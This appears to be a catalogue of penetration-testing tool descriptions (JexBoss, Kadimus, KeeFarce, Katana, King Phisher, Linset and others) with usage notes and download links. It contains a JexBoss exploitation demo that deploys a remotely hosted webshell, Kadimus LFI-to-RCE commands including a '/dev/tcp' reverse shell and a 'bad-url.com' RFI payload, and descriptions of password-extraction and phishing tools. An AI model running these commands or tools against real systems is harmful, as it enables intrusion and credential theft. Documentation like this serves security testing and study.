FEATURES
The tool and exploits were developed and tested for versions 3,
4, 5 and 6 of the JBoss Application Server.
The exploitation vectors are:
/jmx-console
tested and working in JBoss versions 4, 5 and 6
/web-console/Invoker
tested and working in JBoss versions 4
/invoker/JMXInvokerServlet
tested and working in JBoss versions 4 and 5
USAGE EXAMPLE
Check the file "demo.png"
$ git clone https://github.com/joaomatosf/jexboss.git

$ cd jexboss
$ python jexboss.py https://site-teste.com
* --- JexBoss: Jboss verify and EXploitation Tool
|
--- *
|
| @author:
Joo Filho Matos Figueiredo
| @contact: joaomatosf@gmail.com
| @update: https://github.com/joaomatosf/jexboss
#______________________________________________________#
** Checking Host: https://site-teste.com **

* Checking web-console:
[ OK ]
* Checking jmx-console:
[ VULNERABLE ]
* Checking JMXInvokerServlet:
[ VULNERABLE ]
* Do you want to try to run an automated exploitation

via "jmx-console" ?
This operation will provide a simple command shell to
execute commands on the server..
Continue only if you have permission!
yes/NO ? yes
* Sending exploit code to https://site-teste.com.
Wait...
* Info: This exploit will force the server to deploy the

webshell
available on: http://www.joaomatosf.com/rnp/
jbossass.war
* Successfully deployed code! Starting command shell,
wait...
* - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - *
* https://site-teste.com:
Linux fwgw 2.6.32-431.29.2.el6.x86_64 #1 SMP Tue Sep 9
21:36:05 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
CentOS release 6.5 (Final)
uid=509(jboss) gid=509(jboss) grupos=509(jboss)
context=system_u:system_r:initrc_t:s0
[Type commands or "exit" to finish]
Shell> pwd
/usr/jboss-6.1.0.Final/bin
Shell> hostname
fwgw
Shell> ls -all /tmp
total 35436
drwxrwxrwt.
4 root root
dr-xr-xr-x. 22 root root

-rw-r--r--.
4096 Nov 24 16:36 .

4096 Nov 23 03:26 ..
1 root root 34630995 Out 15 18:07
snortrules-snapshot-2962.tar.gz
-rw-r--r--.
1 root root
32 Out 16 14:51
snortrules-snapshot-2962.tar.gz.md5
-rw-------.
1 root root
-rw-------.
1 root root
0 Set 20 16:45 yum.log

2743 Set 20 17:18
yum_save_tx-2014-09-20-17-18nQiKVo.yumtx
-rw-------.
1 root root
1014 Out
6 00:33
yum_save_tx-2014-10-06-00-33vig5iT.yumtx
-rw-------.
1 root root
543 Out
6 02:14
yum_save_tx-2014-10-06-02-143CcA5k.yumtx
-rw-------.
1 root root
18568 Out 14 03:04
yum_save_tx-2014-10-14-03-04Q9ywQt.yumtx
-rw-------.
1 root root
315 Out 15 16:00
yum_save_tx-2014-10-15-16-004hKzCF.yumtx
Shell>
Download JexBoss
JOHNNY - GUI FOR JOHN THE RIPPER
Johnny is a cross-platform open-source GUI for the popular

password cracker John the Ripper.
Features
1. user could start, pause and resume attack (though only

one session is allowed globally),
2. all attack related options work,
3. all input file formats are supported (pure hashes, pwdump,
passwd, mixed),
4. ability to resume any previously started session via
session history,
5. suggest the format of each hashes,

6. try lucky guesses with password guessing feature,
7. smart default options,
8. accurate output of cracked passwords,
9. config is stored in .conf file (~/.john/johnny.conf),
10. nice error messages and other user friendly things,
11. export of cracked passwords through clipboard,
12. export works with office suits (tested with LibreOffice
Calc),
13. available in english and french,
14. allows you to set environment variables for each session
directly in Johnny
Download Johnny
JOOMLAVS - A BLACK BOX, JOOMLA VULNERABILITY
SCANNER
JoomlaVS is a Ruby application that can help automate

assessing how vulnerable a Joomla installation is to
exploitation. It supports basic finger printing and can scan for
vulnerabilities in components, modules and templates as well
as vulnerabilities that exist within Joomla itself.
How to install
JoomlaVS has so far only been tested on Debian, but the

installation process should be similar across most operating
systems.
1. Ensure Ruby [2.0 or above] is installed on your system
2. Clone the source code using git clone https://
github.com/rastating/joomlavs.git
3. Install bundler and required gems using sudo gem

install bundler && bundle install
How to use
The only required option is the -u / --url option, which

specifies the address to target. To do a full scan, however, the
--scan-all option should also be specified, e.g. ruby
joomlavs.rb -u yourjoomlatarget.com --scan-all .
A full list of options can be found below:
usage: joomlavs.rb [options]

Basic options
-u, --url
The Joomla URL/domain to scan.
--basic-auth
<username:password> The basic
HTTP authentication credentials

-v, --verbose
Enable verbose mode
Enumeration options
-a, --scan-all
Scan for all vulnerable
extensions
-c, --scan-components
Scan for vulnerable components
-m, --scan-modules
Scan for vulnerable modules
-t, --scan-templates
Scan for vulnerable templates
-q, --quiet
Scan using only passive
methods
Advanced options
--follow-redirection
Automatically follow
redirections
--no-colour
Disable colours in output
--proxy
<[protocol://]host:port> HTTP,
SOCKS4 SOCKS4A and SOCKS5 are supported. If no protocol

is given, HTTP will be used
--proxy-auth
<username:password> The proxy
authentication credentials
--threads
The number of threads to use
when multi-threading requests

--user-agent
The user agent string to send
with all requests
Download Joomlavs
JSQL INJECTION V0.73 - JAVA TOOL FOR AUTOMATIC
SQL DATABASE INJECTION.
jSQL Injection is a lightweight application used to find

database information from a distant server.
jSQL is free, open source and cross-platform (Windows,
Linux, Mac OS X, Solaris).
jSQL is part of Kali Linux, the official new BackTrack
penetration distribution.
jSQL is also included in Black Hat Sec, ArchAssault Project,
BlackArch Linux and Cyborg Hawk Linux.
CHANGE LOG
Coming... i18n arabic russian chinese integration,
next db engines: SQLite Access MSDE...
v0.73 Authentication Basic Digest Negotiate NTLM and
Kerberos, database type selection
v0.7 Batch scan, Github issue reporter, support for 16
db engines, optimized GUI
alpha-v0.6 Speed x 2 (no more hex encoding), 10 db
vendors supported: MySQL Oracle SQLServer PostgreSQL
DB2 Firebird Informix Ingres MaxDb Sybase. JUnit
tests, log4j, i18n integration and more.
0.5 SQL shell, Uploader.
0.4 Admin page search, Brute force (md5 mysql...),
Decoder (decode encode base64 hex md5...).
0.3 Distant file reader, Webshell drop, Terminal for
webshell commands, Configuration backup, Update
checker.
0.2 Time based algorithm, Multi-thread control (start
pause resume stop), Shows URL calls.
Download jSQL Injection v0.73

JUST-METADATA - TOOL THAT GATHERS AND
ANALYZES METADATA ABOUT IP ADDRESSES
Just-Metadata is a tool that can be used to gather intelligence

information passively about a large number of IP addresses,
and attempt to extrapolate relationships that might not
otherwise be seen. Just-Metadata has "gather" modules which
are used to gather metadata about IPs loaded into the
framework across multiple resources on the internet. JustMetadata also has "analysis" modules. These are used to
analyze the data loaded Just-Metadata and perform various
operations that can identify potential relationships between the
loaded systems.
Just-Metadata will allow you to quickly find the Top "X" number
of states, cities, timezones, etc. that the loaded IP addresses
are located in. It will allow you to search for IP addresses by
country. You can search all IPs to find which ones are used in
callbacks as identified by VirusTotal. Want to see if any IPs
loaded have been documented as taking part of attacks via the
Animus Project, Just-Metadata can do it.
Additionally, it is easy to create new analysis modules to let
people find other relationships between IPs loaded based on
the available data. New intel gathering modules can be easily

added in just as easily!
Setup
Ideally, you should be able to run the setup script, and it will
install everything you need.
For the Shodan information gathering module, YOU WILL
NEED a Shodan API key. This costs like $9 bucks, come on
now, it's worth it :).
Usage
As of now, Just metadata is designed to read in a single text file

containing IPs, each on their own new line. Create this file from
any source (C2 callback IPs, web server logs, etc.). Once you
have this file, start Just-Metadata by calling it:
./Just-Metadata.py
Commands
help - Once in the framework, to see a listing of available

commands and a description of what they do, type the "help"
command.
load <filename> - The load command takes an extra
parameter, the file name that you (the user) want JustMetadata to load IP addresses from. This command will open,
and load all IPs within the file to the framework.
Ex: load ipaddresses.txt
save - The save command can be used to save the current
working state of Just-Metadata. This is helpful in multiple
cases, such as after gathering information about IPs, and
wanting to save the state off to disk to be able to work on them
at a later point in time. Simply typing "save" will result in JustMetadata saving the state to disk, and displaying the filename
of the saved state.

import <statefile> - The import command can be used to load
a previously saved Just-Metadata state into the framework. It
will load all IPs that were saved, and all information gathered
about the IP addresses. This command will require an extra
parameter, the name of the state file that you want JustMetadata to load.
Ex: import goodfile.state
list <module type> - The list command can be used to list the
different types of modules loaded into Just-Metadata. This
command will take an extra parameter, either "analysis" or
"gather". Just-Metadata will display all mofules of the type that
the user requests is listed.
Ex: list analysis
Ex: list gather
gather <gather module name> - The gather command tells
Just-Metadata to run the module specified and gather
information from that source. This can be used to gather
geographical information, Virustotal, whois, and more. It's all
based on the module. The data gathered will be stored within
the framework in memory and can also be saved to disk with
the "save" command.
Ex: gather geoinfo
Ex: gather virustotal
analyze <analysis module name> - The analyze command
tells Metadata to run an analysis module against the data
loaded into the framework. These modules can be used to find
IP addresses that share the same SSH keys or SSL Public Key
certificates, or certificate chains. They can also be used to find
IP addresses used in the same callbacks by malicious
executables.
ip_info <IP Address> - This command is used to dump all

information about a specific IP address. This is currently being
used after having run analysis modules. For example, after
identifying IP addresses that share the same SSH keys, I can
dump all information about those IPs. I will see if they have
been used by malware, where they are located, etc.
export - The export command will have Just-Metadata dump all
information that's been gathered about all IP addresses
currently loaded into the framework to CSV.
Read more here.
DownloadJust-Metadata
KADIMUS - LFI SCAN & EXPLOIT TOOL
Kadimus is a tool to check sites to lfi vulnerability , and also

exploit it
Features:
Check all url parameters

/var/log/auth.log RCE
/proc/self/environ RCE
php://input RCE
data://text RCE
Source code disclosure
Multi thread scanner
Command shell interface through HTTP Request

Proxy support (socks4://, socks4a://, socks5:// ,socks5h://
and http://)
Compile:
Installing libcurl:
CentOS/Fedora
# yum install libcurl-devel
Debian based
# apt-get install libcurl4-openssl-dev
Installing libpcre:
CentOS/Fedora
# yum install libpcre-devel
Debian based
# apt-get install libpcre3-dev
Installing libssh:
CentOS/Fedora
# yum install libssh-devel
Debian based
# apt-get install libssh-dev
And finally:
$ git clone https://github.com/P0cL4bs/Kadimus.git
$ cd Kadimus
$ make
Options:
-h, --help
Display this help menu
Request:
-B, --cookie STRING
Set custom HTTP Cookie
header
-A, --user-agent STRING
User-Agent to send to
server
--connect-timeout SECONDS
Maximum time allowed for
connection
--retry-times NUMBER
number of times to retry
if connection fails
--proxy STRING
Proxy to connect, syntax:
protocol://hostname:port
Scanner:
-u, --url STRING
Single URI to scan
-U, --url-list FILE
File contains URIs to
-o, --output FILE
File to save output
scan
results
--threads NUMBER
Number of threads
(2..1000)
Explotation:
-t, --target STRING
Vulnerable Target to
exploit
--injec-at STRING
Parameter name to inject
exploit
(only need with RCE data
and source disclosure)
RCE:
-X, --rce-technique=TECH
LFI to RCE technique to
-C, --code STRING
Custom PHP code to
use
execute, with php brackets
-c, --cmd STRING
Execute system command on
vulnerable target system

-s, --shell
Simple command shell
interface through HTTP Request

-r, --reverse-shell
Try spawn a reverse shell
connection.
-l, --listen NUMBER
port to listen
-b, --bind-shell
Try connect to a bind-
shell
-i, --connect-to STRING
Ip/Hostname to connect
-p, --port NUMBER
Port number to connect
--ssh-port NUMBER
Set the SSH Port to try
inject command (Default: 22)

--ssh-target STRING
Set the SSH Host
RCE Available techniques

environ
Try run PHP Code using /
proc/self/environ
input
Try run PHP Code using
php://input
auth
Try run PHP Code using /
var/log/auth.log
data
Try run PHP Code using
data://text
Source Disclosure:
-G, --get-source
Try get the source files
using filter://
-f, --filename STRING
Set filename to grab
source [REQUIRED]
-O FILE
Set output file (Default:
stdout)
Examples:
Scanning:
./kadimus -u localhost/?pg=contact -A my_user_agent
./kadimus -U url_list.txt --threads 10 --connect-timeout
10 --retry-times 0
Get source code of file:

./kadimus -t localhost/?pg=contact -G -f "index.php" -O
local_output.php --inject-at pg
Execute php code:

./kadimus -t localhost/?pg=php://input -C '<?php echo
"pwned"; ?>' -X input
Execute command:
./kadimus -t localhost/?pg=/var/log/auth.log -X auth -c
'ls -lah' --ssh-target localhost
Checking for RFI:
You can also check for RFI errors, just put the remote url on
resource/common_files.txt and the regex to identify this,
example:
/* http://bad-url.com/shell.txt */ <?php echo
base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU=
"); ?>
in file:
http://bad-url.com/shell.txt?:scorpion say get over here
Reverse shell:
./kadimus -t localhost/?pg=contact.php -Xdata --inject-at
pg -r -l 12345 -c 'bash -i >& /dev/tcp/127.0.0.1/12345
0>&1' --retry-times 0
Download Kadimus
KALI LINUX 1.1.0 - THE BEST PENETRATION TESTING
DISTRIBUTION
After almost two years of public development (and another year

behind the scenes), we are proud to announce our first point
release of Kali Linux version 1.1.0. This release brings with
it a mix of unprecedented hardware support as well as rock
solid stability. For us, this is a real milestoneas this
releaseepitomizes the benefits of our move from BackTrack to
Kali Linux over two years ago. As we look at a now mature Kali,
we see a versatile, flexible Linux distribution, rich with useful
security and penetration testing related features, running on all
sorts of weird and wonderful ARM hardware.But enough talk,
here are the goods:
The new release runs a 3.18 kernel, patched for wireless
injection attacks.
Our ISO build systems are now running off live-build 4.x.
Improvedwireless driver support, due to both kernel and
firmware upgrades.
NVIDIA Optimus hardware support.
Updated virtualbox-tool, openvm-tools and vmware-tools
packages and instructions.
A whole bunch of fixes and updates from our bug-tracker
changelog.
And most importantly, we changed grub screens and
wallpapers!
Upgrade Kali Linux 1.1.0
If youve already got Kali Linux installed and running, theres no

need to re-download the image as you can simply update your
existing operating system using simple apt commands:
apt-get update
apt-get dist-upgrade
DownloadKali Linux 1.1.0

KALI LINUX 2.0 - THE BEST PENETRATION TESTING
DISTRIBUTION
So, whats new in Kali 2.0? Theres a new 4.0 kernel, now
based on Debian Jessie, improved hardware and wireless
drivercoverage, support for a variety of Desktop Environments
(gnome, kde, xfce, mate, e17, lxde, i3wm), updated desktop
environment and tools and the list goes on.
Kali Linux is Now a Rolling Distribution
One of the biggest moves weve taken to keep Kali 2.0 up-todatein a global, continuous manner, is transforming Kali into
a rolling distribution. What this means is that we are pulling
our packages continuously fromDebian Testing
(aftermakingsure that all packages areinstallable)
essentially upgrading the Kali core system, while allowing us to
take advantage of newer Debian packages as they roll out. This

move is where our choice in Debian as a base system really
pays off we get to enjoy the stability of Debian, while still
remaining on the cutting edge.
Continuously Updated Tools, Enhanced Workflow
Another interesting development in our infrastructure has been

the integration of an upstream version checkingsystem,
which alerts us when new upstream versions of tools are
released (usually via git tagging). This script runs daily on a
select list of common tools and keeps us alerted if a new tool
requires updating. With this new system in place, core tool
updates will happen more frequently. With the introduction of
this new monitoring system, we will slowly start phasing out the
tool upgrades option in our bug tracker.
New Flavours of Kali Linux 2.0
Through our Live Build process, Kali 2.0 now natively supports
KDE, GNOME3, Xfce, MATE, e17, lxde and i3wm. Weve
moved on to GNOME 3 in this release, marking the end of a
long abstinence period. Weve finally embraced GNOME 3 and
with a few custom changes, its grown to be our favourite
desktop environment. Weve added custom support for multilevel menus, true terminal transparency, as well as a handful of
useful gnome shell extensions. This however has come at a
price the minimum RAM requirements for a full GNOME 3
session has increased to 768 MB. This is a non-issue on
modern hardware but can be detrimental on lower-end
machines. For this reason, we have also released an official,
minimal Kali 2.0 ISO. This light flavour of Kali includes a
handful of useful tools together with the lightweight Xfce
desktop environment a perfect solution for resource-
constrained computers.
Kali Linux 2.0 ARM Images &NetHunter 2.0
The whole ARM image section has been updated across the
board with Kali 2.0 including Raspberry Pi, Chromebooks,
Odroids The whole lot! In the process, weve added some
new images such as the latest Chromebook Flip the little
beauty here on the right. Go ahead, click on the image, take a
closer look. Another helpful change weve implemented in our
ARM images is including kernel sources, for easier compilation
of new drivers.
We havent forgotten about NetHunter, our favourite mobile
penetration testing platform which also got an update and
nowincludes Kali 2.0. With this, wevereleased a whole
barrage of new NetHunter images for Nexus 5, 6, 7, 9, and 10.
The OnePlus One NetHunter image has also been updated to
Kali 2.0 and now has a much awaited image for CM12 as well
check the Offensive Security NetHunter page for more
information.
UpdatedVMwareandVirtualBox Images
Offensive Security, the information security trainingand

penetration testing company behind Kali Linux, has put up
new VMware and VirtualBox Kali 2.0 imagesfor those who want
to try Kali in a virtual environment. These include 32 and 64 bit
flavours of the GNOME 3 full Kali environment.
If you want to build your own virtual environment, you can
consult our documentation site on how to install the various
virtual guest tools for a smoother experience.
How Do I Upgrade to Kali 2.0?
Yes, you can upgrade Kali 1.x toKali 2.0!To do this, you will
need to edit your source.list entries, and run a dist-upgrade as
shown below.If you have been using incorrect or extraneous
Kali repositories or otherwise manually installed or overwritten
Kali packages outside of apt, your upgrade to Kali 2.0 may
fail.This includes scripts like lazykali.sh, PTF, manual git
clones in incorrect directories, etc. All of these will clobber
existing files on the filesystem and result in a failed upgrade. If
this is the case for you, youre better off reinstalling your OS
from scratch.
Otherwise, feel free to:
cat << EOF > /etc/apt/sources.list
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security/ sana/updates
main contrib non-free
EOF
apt-get update
apt-get dist-upgrade # get a coffee, or 10.
reboot
DownloadKali Linux 2.0

KALI LINUX NETHUNTER - ANDROID PENETRATION
TESTING PLATFORM
NetHunter is a Android penetration testing platform for Nexus

and OnePlus devices built on top of Kali Linux, which includes
some special and unique features. Of course, you have all the
usual Kali tools in NetHunter as well as the ability to get a full
VNC session from your phone to a graphical Kali chroot,
however the strength of NetHunter does not end there.
Weve incorporated some amazing features into the NetHunter
OS which are both powerful and unique. From pre-programmed
HID Keyboard (Teensy) attacks, to BadUSB Man In The Middle
attacks, to one-click MANA Evil Access Point setups. And yes,

NetHunter natively supports wireless 802.11 frame injection
with a variety of supported USB NICs. NetHunter is still in its
infancy and we are looking forward to seeing this project and
community grow.
Kali Linux NetHunter HID Attack

from Oensive Security
Whats going on here?

Some of your technology may be out of date, which means this video
wont play properly. Please upgrade your browser or install Flash.
Play
Supported Devices
The Kali NetHunter image is currently compatible with the

following Nexus and OnePlus devices:
Nexus 4 (GSM) - mako
Nexus 5 (GSM/LTE) - hammerhead
Nexus 7 [2012] (Wi-Fi) - nakasi
Nexus 7 [2012] (Mobile) - nakasig
Nexus 7 [2013] (Wi-Fi) - razor
Nexus 7 [2013] (Mobile) - razorg
Nexus 10 (Tablet) - mantaray
OnePlus One 16 GB - bacon
OnePlus One 64 GB - bacon
Important Concepts
Kali NetHunter runs within a chroot environment on the

Android device so, for example, if you start an SSH server
via an Android application, your SSH connection would
connect to Android and not Kali Linux. This applies to all
network services.
When configuring payloads, the IP address field is the IP
address of the system where you want the shell to return
to. Depending on your scenario, you may want this
address to be something other than the NetHunter.
Due to the fact that the Android device is rooted, Kali
NetHunter has access to all hardware, allowing you to
connect USB devices such as wireless NICs directly to
Kali using an OTG cable.
DownloadKali Linux NetHunter
KATANA - FRAMEWORK FOR HACKERS, PROFESSIONAL

SECURITY AND DEVELOPERS
Katana is a framework written in python for making penetration

testing, based on a simple and comprehensive structure for
anyone to use, modify and share, the goal is to unify tools
serve for professional when making a penetration test or simply
as a routine tool, The current version is not completely stable,
not complete.
The project is open to partners.
SOURCE CODE ORGANIZATION

The Katana source code is organized as follows:
-KatanaGUI/ > Source code for graphical user interface
-KatanaLAB/ > Source code for katana laboratory
-core/ > Source code core
--core/db/ > Dictionaries and tables
--core/logs/ > Registers of modules
-files/ > Files necessary for some modules
-tmp/ > Temp files
-lib/ > Libraries

-doc/ > Documentation
-scripts/ > Scripts(modules)
MAIN FILES
--core
Setting.py
--- Setting variables
design.py
--- Design template
Errors.py
--- Error Debug
ping.py
--- Funcitons
--scripts
__init__.py
--- Modules List
REQUIREMENTS
OS requirement:
Kali Linux
INSTALLATION
Installation of Katana framework:
git clone https://github.com/RedToor/katana.git
cd Katana
chmod 777 install.py
python install.py
USAGE COMMANDS
Stable
---------------------------------------------------------
--------./sudo ktf.console
98%
Builded - Enabled
./sudo ktf.run -m net/arpspoof
95%
Builded - Enabled
Building
--------------------------------------------------------------ktf.lab
30%
Builded - No yet.
ktf.linker -m web/whois -t google.com -p 80
80%
Builded - No yet.
MODULES (SCRIPTS)
Code Name
Description
Autor
Versi
on
web/httpbt
Brute force to http

403
Redtoor
1.0
web/formbt
Brute force to formbased
Redtoor
1.0
web/
cpfinder
Admin panel finder
Redtoor
1.0
web/
joomscan
Scanner vul's cms

joomla
Redtoor
1.0
web/dos
Denial of service web
Redtoor
1.0
web/whois
Who-is web
Redtoor
1.0
net/
arpspoof
ARP-Spoofing attack
Redtoor
1.0
net/arplook
ARP-Spoofing
detector
cl34r
1.0
net/
portscan
Port Scanner
RedToor
1.0
set/
gdreport
Getting information
with web
RedToor
3.0
set/
mailboom
E-mail boombing
SPAM
RedToor
3.0
set/
facebrok
facebook phishing
plataform
RedToor
1.7
fle/brutezip
Brute force to zip files
LeSZO
ZerO
1.0
fle/bruterar
Brute force to rar files
LeSZO
ZerO
1.0
clt/ftp
Console ftp client
Redtoor
1.0
clt/sql
Console sql client
Redtoor
1.0
clt/pop3
Console pop3 client
Redtoor
1.0
clt/ftp
Console ftp client
Redtoor
1.0
ser/sql
Start SQL server
Redtoor
1.0
ser/apache
Start Apache server
Redtoor
1.0
ser/ssh
Start SSH server
Redtoor
1.0
fbt/ftp
Brute force to ftp
Redtoor
1.0
fbt/ssh
Brute force to ssh
Redtoor
1.0
fbt/sql
Brute force to sql
Redtoor
1.0
fbt/pop3
Brute force to pop3
Redtoor
1.0
LINKS
Project in SF : http://sourceforge.net/projects/katanas/
files/
Documentation: https://github.com/RedToor/Katana/tree/
master/doc
Blog of project[ES]: http://cave-rt.blogspot.com.co/
2015/07/instalacion-y-uso-katana-framework.html
Download Katana
KATOOLIN - AUTOMATICALLY INSTALL ALL KALI LINUX
TOOLS
Automatically install all Kali linux tools

Features
Add Kali linux repositories

Remove kali linux repositorie
Install Kali linux tools
Requirements
Python 2.7
An operating system (tested on Ubuntu)
Instalation
sudo su
git clone https://github.com/LionSec/katoolin.git && cp
katoolin/katoolin.py /usr/bin/katoolin
chmod +x /usr/bin/katoolin
sudo katoolin
Video
An error occurred.
Usage
Just select the number of a tool to install it

Press 0 to install all tools
back : Go back
gohome : Go to the main menu
DownloadKatoolin
KEEFARCE - EXTRACTS PASSWORDS FROM A KEEPASS
2.X DATABASE, DIRECTLY FROM MEMORY
KeeFarce allows for the extraction of KeePass 2.x password

database information from memory. The cleartext information,
including usernames, passwords, notes and url's are dumped
into a CSV file in %AppData%
General Design
KeeFarce uses DLL injection to execute code within the context

of a running KeePass process. C# code execution is achieved
by first injecting an architecture-appropriate bootstrap DLL. This
spawns an instance of the dot net runtime within the
appropriate app domain, subsequently executing
KeeFarceDLL.dll (the main C# payload).
The KeeFarceDLL uses CLRMD to find the necessary object in
the KeePass processes heap, locates the pointers to some
required sub-objects (using offsets), and uses reflection to call
an export method.
Prebuilt Packages
An appropriate build of KeeFarce needs to be used depending

on the KeePass target's architecture (32 bit or 64 bit). Archives
and their shasums can be found under the 'prebuilt' directory.
Executing
In order to execute on the target host, the following files need to

be in the same folder:
BootstrapDLL.dll
KeeFarce.exe
KeeFarceDLL.dll
Microsoft.Diagnostic.Runtime.dll
Copy these files across to the target and execute KeeFarce.exe
Building
Open up the KeeFarce.sln with Visual Studio (note: dev was

done on Visual Studio 2015) and hit 'build'. The results will be
spat out into dist/$architecture. You'll have to copy the
KeeFarceDLL.dll files and Microsoft.Diagnostic.Runtime.dll files
into the folder before executing, as these are architecture
independent.
Compatibility
KeeFarce has been tested on:

KeePass 2.28, 2.29 and 2.30 - running on Windows 8.1 both 32 and 64 bit.
This should also work on older Windows machines (win 7 with
a recent service pack). If you're targeting something other than
the above, then testing in a lab environment before hand is
recommended.
Acknowledgements
Sharp Needle by Chad Zawistowski was used for the DLL

injection tesh.
Code by Alois Kraus was used to get the pointer to object
C# voodoo working.
Download KeeFarce
KEYBOX - A WEB-BASED SSH CONSOLE THAT
CENTRALLY MANAGES ADMINISTRATIVE ACCESS TO
SYSTEMS
KeyBox is a web-based SSH console that centrally manages

administrative access to systems. Web-based administration is
combined with management and distribution of user's public
SSH keys. Key management and administration is based on
profiles assigned to defined users.
Administrators can login using two-factor authentication with
FreeOTP or Google Authenticator. From there they can

manage their public SSH keys or connect to their systems
through a web-shell. Commands can be shared across shells to
make patching easier and eliminate redundant command
execution.
KeyBox layers TLS/SSL on top of SSH and acts as a bastion
host for administration. Protocols are stacked (TLS/SSL + SSH)
so infrastructure cannot be exposed through tunneling / port
forwarding. More details can be found in the following
whitepaper: The Security Implications of SSH. Also, SSH key
management is enabled by default to prevent unmanaged
public keys and enforce best practices.
Prerequisites
Java JDK 1.7 or greater http://www.oracle.com/

technetwork/java/javase/overview/index.html
Browser with Web Socket support http://caniuse.com/
websockets Note: In Safari if using a self-signed certificate
you must import the certificate into your Keychain. Select
'Show Certificate' -> 'Always Trust' when prompted in
Safari
Maven 3 or greater ( Only needed if building from source )
http://maven.apache.org
Install FreeOTP or Google Authenticator to enable twofactor authentication with Android or iOS
To Run Bundled with Jetty
If you're not big on the idea of building from source...

Download keybox-jetty-vXX.XX.tar.gz
https://github.com/skavanagh/KeyBox/releases
Export environment variables
for Linux/Unix/OSX
export JAVA_HOME=/path/to/jdk
export PATH=$JAVA_HOME/bin:$PATH
for Windows
set JAVA_HOME=C:\path\to\jdk
set PATH=%JAVA_HOME%\bin;%PATH%
Start KeyBox
for Linux/Unix/OSX
./startKeyBox.sh
for Windows
startKeyBox.bat
How to Configure SSL in Jetty (it is a good idea to add or

generate your own unique certificate)
http://wiki.eclipse.org/Jetty/Howto/Configure_SSL
Using KeyBox
Open browser to https://<whatever ip>:8443

Login with
username:admin
password:changeme
Steps:
1. Create systems
2. Create profiles
3. Assign systems to profile
4. Assign profiles to users
5. Users can login to create sessions on assigned systems
6. Start a composite SSH session or create and execute a
script across multiple sessions
7. Add additional public keys to systems
8. Disable any adminstrative public key forcing key rotation.
9. Audit session history
DownloadKeyBox
KING PHISHER - PHISHING CAMPAIGN TOOLKIT
King Phisher is a tool for testing and promoting user awareness

by simulating real world phishing attacks. It features an easy to
use, yet very flexible architecture allowing full control over both
emails and server content. King Phisher can be used to run
campaigns ranging from simple awareness training to more
complicated scenarios in which user aware content is served
for harvesting credentials.
King Phisher is only to be used for legal applications when the
explicit permission of the targeted organization has been
obtained.
Why Use King Phisher
Fully Featured And Flexible

King Phisher was created out of a need for an application that
would facilitate running multiple separate campaigns with
different goals ranging from education, credential harvesting
and so called "Drive By" attacks. King Phisher has been used
to run campaigns ranging from hundreds of targets to tens of
thousands of targets with ease. It also supports sending

messages with embedded images and determining when
emails are opened with a tracking image.
Integrated Web Server
King Phisher uses the packaged web server that comes
standard with Python making configuring a separate instance
unnecessary.
Open Source
The Python programming language makes it possible to modify
the King Phisher source code to suite the specific needs of the
user. Alternatively end users not interested in modifying the
source code are welcome to open an issue and request a
feature. Users are able to run campaigns as large as they like,
as often as they like.
No Web Interface
No web interface makes it more difficult for prying eyes to
identify that the King Phisher server is being used for social
engineering. Additionally the lack of a web interface reduces
the exposure of the King Phisher operator to web related
vulnerabilities such as XSS.
DownloadKing Phisher
KUNAI - PWNING & INFO GATHERING VIA USER
BROWSER
Sometimes there is a need to obtain ip address of specific

person or perform client-side attacks via user browser. This is
what you need in such situations.
Kunai is a simple script which collects many informations about
a visitor and saves output to file; furthermore, you may try to
perform attacks on user browser, using beef or metasploit.
In order to grab as many informations as possible, script
detects whenever javascript is enabled to obtain more details
about a visitor. For example, you can include this script in
iframe, or perform redirects, to avoid detection of suspicious
activities. Script can notify you via email about user that visit
your script. Whenever someone will visit your hook (kunai),
output fille will be updated.
Functions
Stores informations about users in elegant output

Website spoofing
Redirects
BeEF & Metasploit compatibility
Email notification
Diffrent reaction for javascript disabled browser
One file composition
Example configs
Website spoofing (more stable & better for autopwn &

beef):
Redirect (better for quick ip catching):
goo.gl/urlink -> evilhost/x.php -> site.com/kitty.png
Cross Site Scripting (inclusion)
DownloadKunai
LIME - LINUX MEMORY EXTRACTOR
A Loadable Kernel Module (LKM) which allows for volatile

memory acquisition from Linux and Linux-based devices, such
as Android. This makes LiME unique as it is the first tool that
allows for full memory captures on Android devices. It also
minimizes its interaction between user and kernel space
processes during acquisition, which allows it to produce
memory captures that are more forensically sound than those
of other tools designed for Linux memory acquisition.
Features
Full Android memory acquisition

Acquisition over network interface
Minimal process footprint
Usage
Detailed documentation on LiME's usage and internals can be

found in the "doc" directory of the project.
LiME utilizes the insmod command to load the module, passing
required arguments for its execution.
insmod ./lime.ko "path=<outfile | tcp:<port>>
format=<raw|padded|lime> [dio=<0|1>]"
path (required):
outfile ~ name of file to write to on
local system (SD Card)

tcp:port ~ network port to communicate over
format (required): raw ~ concatenates all System RAM
ranges
padded ~ pads all non-System RAM ranges with 0s
lime ~ each range prepended with fixed-size
header containing address space info
dio (optional):
1 ~ attempt to enable Direct IO
0 ~ default, do not attempt Direct IO

localhostonly (optional):
1 restricts the tcp to only
listen on localhost, 0 binds on all interfaces (default)
Examples
In this example we use adb to load LiME and then start it with
acquisition performed over the network
$ adb push lime.ko /sdcard/lime.ko
$ adb forward tcp:4444 tcp:4444
$ adb shell
$ su
# insmod /sdcard/lime.ko "path=tcp:4444 format=lime"
Now on the host machine, we can establish the connection and

acquire memory using netcat
$ nc localhost 4444 > ram.lime
Acquiring to sdcard
# insmod /sdcard/lime.ko "path=/sdcard/ram.lime
format=lime"
Download Lime
LINSET - WPA/WPA2 HACK WITHOUT BRUTE FORCE
How it works
Scan the networks.

Select network.
Capture handshake (can be used without handshake)
We choose one of several web interfaces tailored for me
(thanks to the collaboration of the users)
Mounts one FakeAP imitating the original
A DHCP server is created on FakeAP
It creates a DNS server to redirect all requests to the Host
The web server with the selected interface is launched
The mechanism is launched to check the validity of the

passwords that will be introduced
It deauthentificate all users of the network, hoping to
connect to FakeAP and enter the password.
The attack will stop after the correct password checking
Are necessary tengais installed dependencies, which Linset
check and indicate whether they are installed or not.
It is also preferable that you still keep the patch for the
negative channel, because if not, you will have complications
relizar to attack correctly
How to use
$ chmod +x linset
$ ./linset
DownloadLINSET
LMD - LINUX MALWARE DETECT
Linux Malware Detect (LMD) is a malware scanner for Linux
released under the GNU GPLv2 license, that is designed
around the threats faced in shared hosted environments. It
uses threat data from network edge intrusion detection systems
to extract malware that is actively being used in attacks and
generates signatures for detection. In addition, threat data is
also derived from user submissions with the LMD checkout
